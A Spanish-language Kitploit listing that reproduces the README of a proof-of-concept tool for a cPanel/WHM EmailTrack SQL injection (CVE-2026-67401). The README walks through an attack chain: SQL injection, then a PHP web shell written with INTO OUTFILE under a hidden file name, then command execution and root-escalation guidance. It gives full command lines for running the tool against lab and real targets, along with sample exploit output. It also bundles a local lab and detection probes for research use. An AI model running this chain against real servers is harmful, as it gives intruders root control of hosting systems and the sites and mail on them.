Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-67401 — Prueba de concepto para CVE-2026-67401, una inyección SQL en EmailTrack de cPanel/WHM que permite escritura arbitraria de archivos y RCE como root, con sondas de detección de SQLi y un laboratorio vulnerable autocontenido. | Kitploit
Herramientas/GitHubGitHub/imbas007/cve-2026-67401
Escáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubimbas007/cve-2026-67401

CVE-2026-67401

Prueba de concepto para CVE-2026-67401, una inyección SQL en EmailTrack de cPanel/WHM que permite escritura arbitraria de archivos y RCE como root, con sondas de detección de SQLi y un laboratorio vulnerable autocontenido.

hace 3h 58mAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-67401 — Inyección SQL en EmailTrack de cPanel/WHM → RCE como root

CVE Severity Platform Python

Prueba de concepto para CVE-2026-67401, una vulnerabilidad crítica de inyección SQL en la funcionalidad EmailTrack de cPanel & WHM que permite a un usuario autenticado con privilegios relacionados con correo escribir archivos arbitrarios y ejecutar código como root.

Descubierto por: Ali Mustafa Divulgado: 8 de septiembre de 2026 Componente: EmailTrack (registro / seguimiento de entrega de correo)


Versiones afectadas

Las versiones anteriores a las compilaciones corregidas son vulnerables.

Serie de compilación de cPanelVersión corregida
11.11011.110.0.143
11.13411.134.0.55
11.13611.136.0.39
11.13811.138.0.4
WP2 (11.138)11.138.1.9

Comprueba tu versión con:

root@kitploit:~
cat /usr/local/cpanel/version

Cadena de explotación

root@kitploit:~
┌─────────────┐      ┌────────────┐      ┌─────────┐      ┌──────────┐
│ Auth as     │ ───► │ SQLi in    │ ───► │ INTO    │ ───► │ RCE as   │
│ cPanel user │      │ EmailTrack │      │ OUTFILE │      │ root     │
│ (mail priv) │      │ API call   │      │ (shell) │      │          │
└─────────────┘      └────────────┘      └─────────┘      └──────────┘
  1. Autenticarse en cPanel con una cuenta que tenga privilegios de correo.
  2. Inyectar a través del parámetro account de EmailTrack.
  3. Escribir un web shell PHP con SELECT ... INTO OUTFILE en public_html/.
  4. Ejecutar comandos a través del shell.
  5. Escalar mediante binarios SUID de cPanel, cron o la cola de tareas.

Contenido del repositorio

ArchivoDescripción
poc_sqli.pyDetección de inyección SQL: basada en booleanos, basada en tiempo y conteo de columnas UNION
poc_full_chain.pyCadena de explotación completa: SQLi → web shell con INTO OUTFILE → RCE → guía para root
lab/vuln_server.pySimulación local del backend vulnerable de EmailTrack (segura, autocontenida)
README.mdEste documento

El laboratorio incluido te permite ejecutar y validar toda la cadena sin un servidor cPanel real.


Requisitos

  • Python 3.8+
  • Sin paquetes de terceros — todo usa la biblioteca estándar.

Uso

Todos los comandos se ejecutan desde la raíz del repositorio.

1. Ejecutar el laboratorio local

root@kitploit:~
python3 lab/vuln_server.py 18123 lab/htdocs
  • Credenciales: alice / s3cr1t
  • Emula: inicio de sesión UAPI, la consulta vulnerable de EmailTrack, SLEEP(), INTO OUTFILE y la ejecución de web shells PHP.
  • Argumento 1: puerto (por defecto 18123)
  • Argumento 2: raíz de documentos (por defecto lab/htdocs)

Deja esto en ejecución en una terminal y usa una segunda terminal para los PoC.

2. Detección de inyección SQL

root@kitploit:~
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode detect
ArgumentoDescripción
-H, --hostHost de cPanel, p. ej. https://cp.example.com:2083
-u, --usernameCuenta de cPanel con privilegios de correo
-p, --passwordContraseña de la cuenta
--paramParámetro inyectable (por defecto: account)
--modedetect (por defecto), boolean, timing, union o all
--sleepDuración de SLEEP() para la sonda de tiempo (por defecto: 3.0)
--dump-versionIntenta extraer la versión del DBMS mediante UNION
--insecureOmite la verificación del certificado TLS

Ejecutar una sonda específica:

root@kitploit:~
# UNION column count only
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode union

# Time-based only, 5-second delay
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode timing --sleep 5

3. Cadena de explotación completa

root@kitploit:~
CPANEL_USER=alice CPANEL_PASS='s3cr1t' \
  python3 poc_full_chain.py http://127.0.0.1:18123 \
  --shell-base http://127.0.0.1:18123
Argumento / EnvDescripción
host (posicional)Host de cPanel, o establece la variable de entorno CPANEL_HOST
CPANEL_USERCuenta de cPanel con privilegios de correo
CPANEL_PASSContraseña de la cuenta
--shell-baseURL base que sirve public_html (donde se alcanza el web shell)
--insecureOmite la verificación del certificado TLS
--no-escalateDetente tras el RCE; omite la guía de escalada a root
SHELL_NAME (env)Nombre de archivo del web shell (por defecto: .mail.cache.php)

Etapas ejecutadas automáticamente:

  1. Autenticarse en cPanel
  2. Confirmar la inyección SQL (booleana + basada en tiempo)
  3. Determinar el número de columnas de la consulta mediante UNION
  4. Escribir un web shell PHP con SELECT ... INTO OUTFILE
  5. Ejecutar comandos a través del shell (id, whoami, enumeración de SUID, …)
  6. Imprimir la guía de escalada a root (SUID whmapi1, cron, cola de tareas)

4. Contra un objetivo real

root@kitploit:~
# Detection
python3 poc_sqli.py -H https://cp.example.com:2083 -u user -p 'pass' \
  --insecure --mode detect

# Full chain (--shell-base is the account's web host, not the cPanel port)
CPANEL_USER=user CPANEL_PASS='pass' \
  python3 poc_full_chain.py https://cp.example.com:2083 \
  --shell-base https://cp.example.com --insecure

Nota: el --shell-base predeterminado elimina el puerto exclusivo de cPanel (2082/2083) del host. Si la raíz de documentos se sirve en un puerto diferente, establécelo explícitamente.


Resultados verificados

Salida producida contra el laboratorio incluido:

root@kitploit:~
  CVE-2026-67401  cPanel/WHM EmailTrack SQLi -> File Write -> RCE
  version 1.0

  target: http://127.0.0.1:18123
  user:   alice
  [+] authenticated
  [1] confirming SQL injection in EmailTrack `account`
  [+] boolean-based SQLi CONFIRMED
  [+] time-based SQLi CONFIRMED (SLEEP(2) -> 6.0s)
  [2] determining column count via UNION
  [+] target query has 5 columns
  [3] writing PHP web shell via SELECT ... INTO OUTFILE
  [+] shell written -> /home/alice/public_html/.mail.cache.php
  [4] executing commands through the web shell
  [+] id -> uid=1000(x) gid=1000(x) ...

Referencias

  • Critical cPanel SQL Injection Lets Attackers Grab Root Access — The Daily Tech Feed
  • cPanel Security Advisory: CVE-2026-67401
  • CWE-89: Improper Neutralization of Special Elements used in an SQL Command

Licencia

Publicado con fines educativos y de investigación de seguridad autorizada. Consulta el Descargo de responsabilidad antes de usarlo.

Descargar herramienta